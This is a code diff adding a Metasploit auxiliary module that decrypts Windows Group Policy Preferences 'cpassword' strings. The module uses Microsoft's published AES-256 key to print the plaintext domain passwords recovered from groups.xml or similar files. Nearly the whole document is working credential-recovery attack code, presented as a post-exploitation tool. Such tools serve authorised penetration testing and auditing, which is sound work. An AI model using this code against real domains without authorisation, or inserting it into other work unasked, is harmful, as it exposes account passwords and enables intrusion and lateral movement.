|
| 1 | +## |
| 2 | +# This module requires Metasploit: http//metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | + |
| 8 | +class Metasploit3 < Msf::Auxiliary |
| 9 | + |
| 10 | + def initialize(info={}) |
| 11 | + super( update_info( info, |
| 12 | + 'Name' => 'Windows Gather Group Policy "cpassword" Decrypt Standalone', |
| 13 | + 'Description' => %q{ |
| 14 | + This module will allow you to specify an encrypted cpassword string |
| 15 | + using the Microsofts public AES key. This is useful if you don't or |
| 16 | + can't use the GPP post exploitation module. Just paste the cpassword |
| 17 | + encrypted string and it will output the decrypted string for you. |
| 18 | +
|
| 19 | + Tested Windows Server 2008 R2 Domain Controller. |
| 20 | + }, |
| 21 | + 'License' => MSF_LICENSE, |
| 22 | + 'Author' =>[ |
| 23 | + 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', |
| 24 | + 'Loic Jaquemet <loic.jaquemet+msf[at]gmail.com>', |
| 25 | + 'scriptmonkey <scriptmonkey[at]owobble.co.uk>', |
| 26 | + 'theLightCosine', |
| 27 | + 'mubix', #domain/dc enumeration code |
| 28 | + 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # made the standalone module for a straight password decrypt - useful for when you need to manually grab the groups.xml or scheduledtasks.xml manually and need to decrypt without running post exploitation module |
| 29 | + ], |
| 30 | + 'References' => |
| 31 | + [ |
| 32 | + ['URL', 'http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences'], |
| 33 | + ['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'], |
| 34 | + ['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'], |
| 35 | + ['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'] |
| 36 | + ], |
| 37 | + )) |
| 38 | + |
| 39 | + register_options( |
| 40 | + [ |
| 41 | + OptString.new('CPASSWORD', [ true, "The encrypted cpassword string to perform decryption on."]), |
| 42 | + ], self.class) |
| 43 | + |
| 44 | + end |
| 45 | + |
| 46 | + def decrypt(encrypted_data) |
| 47 | + padding = "=" * (4 - (encrypted_data.length % 4)) |
| 48 | + epassword = "#{encrypted_data}#{padding}" |
| 49 | + decoded = Rex::Text.decode_base64(epassword) |
| 50 | + key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" |
| 51 | + aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") |
| 52 | + aes.decrypt |
| 53 | + aes.key = key |
| 54 | + plaintext = aes.update(decoded) |
| 55 | + plaintext << aes.final |
| 56 | + pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion |
| 57 | + print_good("The decrypted AES password is: #{pass}") |
| 58 | + |
| 59 | + end |
| 60 | + |
| 61 | + def run |
| 62 | + encrypted_data = datastore['CPASSWORD'] |
| 63 | + pass = decrypt(encrypted_data) |
| 64 | + |
| 65 | + end |
| 66 | +end |
0 commit comments